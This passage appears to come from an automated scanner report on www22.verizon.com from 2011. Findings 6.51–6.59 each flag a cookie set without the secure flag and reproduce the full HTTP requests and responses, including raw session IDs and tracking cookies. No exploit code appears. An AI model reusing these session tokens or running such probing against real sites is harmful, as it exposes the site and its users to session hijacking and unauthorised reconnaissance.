GIF89a.......................................................................................................!.......,............q$JY.h.0l......dSxn......0.)j6....i:...tJ.z...v..z...xL.....z.n....|N.
...[SNIP]...

6.51. https://www22.verizon.com/images/headerfooter/scbsmbdividervert.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/images/headerfooter/scbsmbdividervert.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660;path=/;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbdividervert.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 381
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbdividervert.gif
Last-Modified: Sun, 17 Jul 2011 02:18:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660;path=/;httponly

GIF89a.......................................................................................................!.......,............ .dI.AQ....n..."...'...=^@.P....B.d..Oe...V..,...p....!x<.f.9.^.!..\..
...[SNIP]...

6.52. https://www22.verizon.com/images/headerfooter/scbsmbhoriztile.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/images/headerfooter/scbsmbhoriztile.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660;path=/;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbhoriztile.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 587
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbhoriztile.gif
Last-Modified: Sun, 17 Jul 2011 02:18:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660;path=/;httponly

GIF89a
......................................................................................................!.......,....
....... .dY.h..l...Z.tm..l.|.....w(....ryD8...tJ.&...v..z...xL.....z.n...x.A.
...[SNIP]...

6.53. https://www22.verizon.com/includes/cache/15/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/cache/15/blank.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:27:04 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/cache/15/blank.html HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 0
Content-Type: text/html
Last-Modified: Fri, 07 May 2010 18:39:58 GMT
Accept-Ranges: bytes
ETag: "e8adcb114eeca1:111b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:04 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:27:04 GMT; path=/includes/; domain=verizon.com

6.54. https://www22.verizon.com/includes/cache/getwb31.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/cache/getwb31.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:28:18 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/cache/getwb31.asp?zip=10011 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ForgotUserIDPassword
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 683
Content-Type: text/javascript
Expires: Mon, 05 Sep 2011 22:28:18 GMT
Cache-Control: Private
Date: Mon, 05 Sep 2011 22:23:18 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:28:18 GMT; path=/includes/; domain=verizon.com

rewriteHTML('scbwbnotice','');
rewriteHTML('scbwblinktext','New York, NY 10011');
rewriteHTML('scbwbicon','<a href=\'http://weather.weatherbug.com/NY/New York-weather.html?zcode=z6726&zi
...[SNIP]...

6.55. https://www22.verizon.com/includes/javascript/commonjs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/commonjs/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/commonjs/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 18981
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com

var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* detect.js */

var agt=navigator.userAgent.toLowerCase();
va
...[SNIP]...

6.56. https://www22.verizon.com/includes/javascript/hbx.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx.js/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:42 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/hbx.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:42 GMT
Content-Length: 16426
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:42 GMT; path=/includes/; domain=verizon.com

//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/*
...[SNIP]...

6.57. https://www22.verizon.com/includes/javascript/hbx_custom.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx_custom.js/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/hbx_custom.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 19482
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com

if(typeof(ghfT)=='undefined'){var ghfT='noscb';}

function fObj(n,d){
var p,i,x;if(!d)d=document;if((p=n.indexOf('?'))>0&&parent.frames.length){
d=parent.frames[n.substring(p+1)].document;n=n.
...[SNIP]...

6.58. https://www22.verizon.com/includes/javascript/sitewise.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/sitewise.js/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:59 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/sitewise.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 10531
Date: Mon, 05 Sep 2011 22:21:59 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:59 GMT; path=/includes/; domain=verizon.com

// START OF SDC Advanced Tracking Code
// Copyright (c) 1996-2005 WebTrends Inc. All rights reserved.
// V8.0
// $DateTime: 2006/05/02 08:33:13 $

var gService = true;
var gTimeZone = -6;

...[SNIP]...

6.59. https://www22.verizon.com/vztracker/vzTracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/vztracker/vzTracker.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:29:19 GMT; path=/vztracker/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vztracker/vzTracker.aspx?appName=ECSP_OLH&Type=2|A&requestUrl=javscrit%3AO_LC%28%29%3B&referrer=http%3A//www22.verizon.com/ResidentialHelp/Generic/Ask%2520Verizon/Getting%2520Started/124519.htm&Title=Feedbackfeedbacklink&id=2563991732895.3745 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; 